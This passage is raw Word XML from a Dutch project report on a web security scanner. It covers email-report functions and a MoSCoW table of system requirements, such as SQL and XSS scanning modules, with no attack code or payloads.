                              <w:t>Figure 4.21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2271FE" id="Text Box 514" o:spid="_x0000_s1108" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:.15pt;margin-top:194.75pt;width:279.05pt;height:14.2pt;z-index:252030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B5tzwCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFRNbxoxEL1X6n+wfC8LAdoUsUSUiKoSSiJB&#10;lbPx2qwl2+Pahl366zv2siRNe6p68Y5nxvPx3szO71qjyUn4oMCWdDQYUiIsh0rZQ0m/79YfbikJ&#10;kdmKabCipGcR6N3i/bt542biBmrQlfAEg9gwa1xJ6xjdrCgCr4VhYQBOWDRK8IZFvPpDUXnWYHSj&#10;i5vh8GPRgK+cBy5CQO19Z6SLHF9KweOjlEFEokuKtcV8+nzu01ks5mx28MzVil/KYP9QhWHKYtJr&#10;qHsWGTl69Ucoo7iHADIOOJgCpFRc5B6wm9HwTTfbmjmRe0FwgrvCFP5fWP5wevJEVSWdjiaUWGaQ&#10;pJ1oI/kCLUk6RKhxYYaOW4eusUUDMt3rAypT4630Jn2xJYJ2xPp8xTeF46gcTyfjz+MpJRxto9vh&#10;eJIJKF5eOx/iVwGGJKGkHvnLsLLTJkSsBF17l5QsgFbVWmmdLsmw0p6cGHLd1CqKVCO++M1L2+Rr&#10;Ib3qzJ1G5GG5ZEkNd40lKbb7NkP0adp3vYfqjGB46AYqOL5WmH7DQnxiHicI+8etiI94SA1NSeEi&#10;UVKD//k3ffJHYtFKSYMTWdLw48i8oER/s0h5Gt9e8L2w7wV7NCvAxke4b45nER/4qHtRejDPuCzL&#10;lAVNzHLMVdLYi6vY7QUuGxfLZXbCIXUsbuzW8RS6h3nXPjPvLiRFpPcB+lllszdcdb4d6MtjBKky&#10;kQnYDkXkKF1wwDNbl2VMG/T6nr1efhmLXwAAAP//AwBQSwMEFAAGAAgAAAAhANjIKMbgAAAACAEA&#10;AA8AAABkcnMvZG93bnJldi54bWxMj0FPwkAQhe8m/ofNmHgxsgUpltotUcCbHkDCeemObWN3tulu&#10;afn3jie8vGTyXt77JluNthFn7HztSMF0EoFAKpypqVRw+Hp/TED4oMnoxhEquKCHVX57k+nUuIF2&#10;eN6HUnAJ+VQrqEJoUyl9UaHVfuJaJPa+XWd14LMrpen0wOW2kbMoWkira+KFSre4rrD42fdWwWLT&#10;9cOO1g+bw/ZDf7bl7Ph2OSp1fze+voAIOIZrGP7wGR1yZjq5nowXjYInzrEmyxgE23GczEGcFMyn&#10;z0uQeSb/P5D/AgAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAA&#10;AAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACRwebc8AgAAegQAAA4AAAAA&#10;AAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhANjIKMbgAAAACAEAAA8A&#10;AAAAAAAAAAAAAAAAlAQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAChBQAAAAA=&#10;" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="49E998DE" w14:textId="563C05BA" w:rsidR="00CE4BB5" w:rsidRPr="000A6E8D" w:rsidRDefault="00CE4BB5" w:rsidP="008A237F">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.21</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="46833F02" w14:textId="416E1DE5" w:rsidR="00C60E78" w:rsidRDefault="00C60E78">
      <w:r>
        <w:t>De vier belangrijkste functionaliteiten zijn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4EC56D" w14:textId="1B77A654" w:rsidR="00C60E78" w:rsidRDefault="00C60E78" w:rsidP="00212048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>From</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D8802D6" w14:textId="55E19BFD" w:rsidR="002E36E4" w:rsidRDefault="002E36E4" w:rsidP="00212048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Het adres van de verzender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E7A1B7" w14:textId="35AB0069" w:rsidR="00C60E78" w:rsidRDefault="00C60E78" w:rsidP="00212048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B2A275B" w14:textId="2B349DDC" w:rsidR="002E36E4" w:rsidRDefault="002E36E4" w:rsidP="00212048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Het adres van de ontvanger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D4E2F4" w14:textId="192C29B0" w:rsidR="00C60E78" w:rsidRDefault="00C60E78" w:rsidP="00212048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Subject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C98C58F" w14:textId="420037EC" w:rsidR="002E36E4" w:rsidRDefault="002E36E4" w:rsidP="00212048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Het onderwerp van de email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3005D2DD" w14:textId="5F4A821B" w:rsidR="002E36E4" w:rsidRDefault="002E36E4" w:rsidP="00212048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Attach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D6E3007" w14:textId="4203B902" w:rsidR="002E36E4" w:rsidRDefault="002E36E4" w:rsidP="00212048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Het pdf-bestand dat mee wordt verstuurd (rapport)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4D268B" w14:textId="77777777" w:rsidR="003F2353" w:rsidRDefault="00D86331" w:rsidP="002E36E4">
      <w:r>
        <w:t>Voor de MVP zal ik h</w:t>
      </w:r>
      <w:r w:rsidR="00142824">
        <w:t>et houden</w:t>
      </w:r>
      <w:r w:rsidR="004B53F5">
        <w:t xml:space="preserve"> op deze vier functies. De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004B53F5">
        <w:t>Attach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B53F5">
        <w:t xml:space="preserve"> functie is het meest interessant omdat deze ervoor zorgt dat het rapport in pdf-formaat mee verzonden kan worden. </w:t>
      </w:r>
      <w:r w:rsidR="0085640C">
        <w:t>Het vraagt om de bestands locatie van het rapport die opgeslagen staat in</w:t>
      </w:r>
      <w:r w:rsidR="00F35C7E">
        <w:t xml:space="preserve"> een resource map op de server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D0A759" w14:textId="548417FA" w:rsidR="003C1492" w:rsidRPr="00D8631B" w:rsidRDefault="003F2353">
      <w:r>
        <w:t>Zodra de email ontvangen is door de klant zijn de processen van</w:t>
      </w:r>
      <w:r w:rsidR="009C752F">
        <w:t xml:space="preserve"> het Software Systeem afgerond en is het systeem</w:t>
      </w:r>
      <w:r w:rsidR="0047583C">
        <w:t xml:space="preserve"> weer</w:t>
      </w:r>
      <w:r w:rsidR="009C752F">
        <w:t xml:space="preserve"> bereid om het </w:t>
      </w:r>
      <w:r w:rsidR="0047583C">
        <w:t>volgende verzoek te verwerken.</w:t>
      </w:r>
      <w:r w:rsidR="005B401D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C1492">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C7802D" w14:textId="00A02C53" w:rsidR="008571B9" w:rsidRPr="00716C78" w:rsidRDefault="00CE1A90" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716C78">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.3 </w:t>
      </w:r>
      <w:r w:rsidR="00397FDD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Systeemeisen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE244EA" w14:textId="6FAF3FC9" w:rsidR="00950C1F" w:rsidRPr="000B261C" w:rsidRDefault="00AC0828" w:rsidP="008571B9">
      <w:r w:rsidRPr="00DA22A1">
        <w:t xml:space="preserve">In dit hoofdstuk worden de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA22A1">
        <w:t>requirements</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA22A1">
        <w:t xml:space="preserve"> van de </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA22A1">
        <w:t xml:space="preserve"> scanner behandeld. </w:t>
      </w:r>
      <w:r w:rsidR="00D9171A" w:rsidRPr="00DA22A1">
        <w:t xml:space="preserve">Hiervoor maak ik gebruik van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D9171A" w:rsidRPr="00DA22A1">
        <w:t>MoSCoW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D9171A" w:rsidRPr="00DA22A1">
        <w:t xml:space="preserve"> methode.</w:t>
      </w:r>
      <w:r w:rsidR="009A6581" w:rsidRPr="00DA22A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB0E51" w:rsidRPr="00DA22A1">
        <w:t xml:space="preserve">Met de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB0E51" w:rsidRPr="00DA22A1">
        <w:t>MoSCoW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB0E51" w:rsidRPr="00DA22A1">
        <w:t xml:space="preserve"> kun je niet een lijst maken met de vereiste features van een product maar ook </w:t>
      </w:r>
      <w:r w:rsidR="009B750D" w:rsidRPr="00DA22A1">
        <w:t xml:space="preserve">kunnen de prioriteiten gegeven worden aan elke feature. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0D8C7E" w14:textId="1089EF57" w:rsidR="00930A64" w:rsidRPr="00861E36" w:rsidRDefault="001B1B80" w:rsidP="00C00EE2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00861E36">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>4.3.1</w:t>
      </w:r>
      <w:r w:rsidR="0038333D" w:rsidRPr="00861E36">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004B432E" w:rsidRPr="00861E36">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>MoSCo</w:t>
      </w:r>
      <w:r w:rsidR="00C24964" w:rsidRPr="00861E36">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66F62D7F" w14:textId="77777777" w:rsidR="00930A64" w:rsidRPr="00861E36" w:rsidRDefault="00930A64" w:rsidP="00C00EE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00861E36">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>MoSCoW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00861E36">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00861E36">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>staat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00861E36">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00861E36">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>voor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00861E36">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F77E366" w14:textId="0EF412EB" w:rsidR="00930A64" w:rsidRDefault="00930A64" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Must </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>haves</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004843EA">
        <w:t xml:space="preserve"> – eisen die in het project moeten terugkomen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D48357" w14:textId="2E1530B7" w:rsidR="002A7453" w:rsidRDefault="00930A64" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Should</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>haves</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004843EA">
        <w:t xml:space="preserve"> – eisen die gewenst zijn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C1EB9E" w14:textId="794D8766" w:rsidR="00930A64" w:rsidRDefault="00930A64" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Could</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>haves</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004843EA">
        <w:t xml:space="preserve"> – als er tijd over is kunnen deze eisen meegenomen worden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAA8A8E" w14:textId="07EE126A" w:rsidR="00930A64" w:rsidRDefault="00930A64" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Won</w:t>
      </w:r>
      <w:r w:rsidR="004843EA">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>haves</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004843EA">
        <w:t xml:space="preserve"> – eisen die niet worden meegenomen in dit project  </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4531"/>
        <w:gridCol w:w="1979"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C7426E" w:rsidRPr="00422628" w14:paraId="0B19DC97" w14:textId="77777777" w:rsidTr="00C7426E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10D5983F" w14:textId="3F8EB263" w:rsidR="00C7426E" w:rsidRDefault="00145996" w:rsidP="00C00EE2">
            <w:r>
              <w:t>Project Web Security Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1979" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D3E5398" w14:textId="02D524D0" w:rsidR="00C7426E" w:rsidRPr="001D4F2E" w:rsidRDefault="00C7426E" w:rsidP="00C00EE2">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001D4F2E">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Prioriteit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001D4F2E">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001D4F2E">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>M,S</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001D4F2E">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>,C,W)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C7426E" w14:paraId="404B1D58" w14:textId="77777777" w:rsidTr="00C7426E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A3055C2" w14:textId="3103B7A6" w:rsidR="00C7426E" w:rsidRDefault="00DE58C1" w:rsidP="00C00EE2">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>CLI interface</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1979" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B56E991" w14:textId="534521C8" w:rsidR="00C7426E" w:rsidRDefault="004843EA" w:rsidP="00C00EE2">
            <w:r>
              <w:t>M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C7426E" w14:paraId="1C4AAEF1" w14:textId="77777777" w:rsidTr="00C7426E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CB17F41" w14:textId="0E280991" w:rsidR="00C7426E" w:rsidRDefault="00DE58C1" w:rsidP="00C00EE2">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Crawler</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1979" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="606BA2A0" w14:textId="1E2DD51E" w:rsidR="00C7426E" w:rsidRDefault="004843EA" w:rsidP="00C00EE2">
            <w:r>
              <w:t>M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C7426E" w14:paraId="5D00AC35" w14:textId="77777777" w:rsidTr="00C7426E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78260CB8" w14:textId="76A92914" w:rsidR="00C7426E" w:rsidRDefault="00DE58C1" w:rsidP="00C00EE2">
            <w:r>
              <w:t>SQL Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1979" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66C2DF62" w14:textId="5F55A31C" w:rsidR="00C7426E" w:rsidRDefault="004843EA" w:rsidP="00C00EE2">
            <w:r>
              <w:t>M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C7426E" w14:paraId="187017DC" w14:textId="77777777" w:rsidTr="00C7426E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DDB65E3" w14:textId="5299D2EF" w:rsidR="00C7426E" w:rsidRDefault="00DE58C1" w:rsidP="00C00EE2">
            <w:r>
              <w:t>XSS Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1979" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64E0A03C" w14:textId="10BE5D3C" w:rsidR="00C7426E" w:rsidRDefault="007D5162" w:rsidP="00C00EE2">
            <w:r>
              <w:t>M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C7426E" w14:paraId="135C20FA" w14:textId="77777777" w:rsidTr="00C7426E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F500247" w14:textId="604276CD" w:rsidR="00C7426E" w:rsidRDefault="002A7453" w:rsidP="00C00EE2">
            <w:r>
              <w:t xml:space="preserve">Authenticatie </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1979" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B742FD7" w14:textId="2836004A" w:rsidR="00C7426E" w:rsidRDefault="004843EA" w:rsidP="00C00EE2">
            <w:r>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C7426E" w14:paraId="50806994" w14:textId="77777777" w:rsidTr="00C7426E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5069D071" w14:textId="4B7D0F56" w:rsidR="00C7426E" w:rsidRDefault="009E7AA4" w:rsidP="00C00EE2">
            <w:r>
              <w:t>Rapport generatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1979" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="066E4CAE" w14:textId="3AB5E722" w:rsidR="00C7426E" w:rsidRDefault="004843EA" w:rsidP="00C00EE2">
            <w:r>
              <w:t>M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C7426E" w14:paraId="7C457BB0" w14:textId="77777777" w:rsidTr="004843EA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="695F3FB6" w14:textId="303716BF" w:rsidR="00C7426E" w:rsidRDefault="004843EA" w:rsidP="00C00EE2">
            <w:r>
              <w:t>Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1979" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="061C0702" w14:textId="4C7064CB" w:rsidR="00C7426E" w:rsidRDefault="004843EA" w:rsidP="00C00EE2">
            <w:r>
              <w:t>C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6A2F" w14:paraId="06C7FBA9" w14:textId="77777777" w:rsidTr="004843EA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28382D46" w14:textId="220C8CD5" w:rsidR="00CE6A2F" w:rsidRDefault="00266D76" w:rsidP="00C00EE2">
            <w:r>
              <w:t>Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1979" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E2D9C0B" w14:textId="5683917B" w:rsidR="00CE6A2F" w:rsidRDefault="00266D76" w:rsidP="00C00EE2">
            <w:r>
              <w:t>M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00266D76" w14:paraId="07CA7380" w14:textId="77777777" w:rsidTr="004843EA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2941571D" w14:textId="7CBDA646" w:rsidR="00266D76" w:rsidRDefault="00266D76" w:rsidP="00C00EE2">
            <w:r>
              <w:t>API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1979" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AB7C9ED" w14:textId="12A0D527" w:rsidR="00266D76" w:rsidRDefault="00266D76" w:rsidP="00C00EE2">
            <w:r>
              <w:t>M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00266D76" w14:paraId="33DF31B5" w14:textId="77777777" w:rsidTr="00266D76">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4056634C" w14:textId="1482CE63" w:rsidR="00266D76" w:rsidRDefault="00266D76" w:rsidP="00C00EE2">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>WordPress</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Magento</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> extensie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1979" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D2C344C" w14:textId="79347970" w:rsidR="00266D76" w:rsidRDefault="00266D76" w:rsidP="00C00EE2">
            <w:r>
              <w:t>M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11D9417B" w14:textId="77777777" w:rsidR="005B09B2" w:rsidRDefault="005B09B2"/>
    <w:p w14:paraId="642F9F00" w14:textId="77777777" w:rsidR="00B114F2" w:rsidRDefault="00B114F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
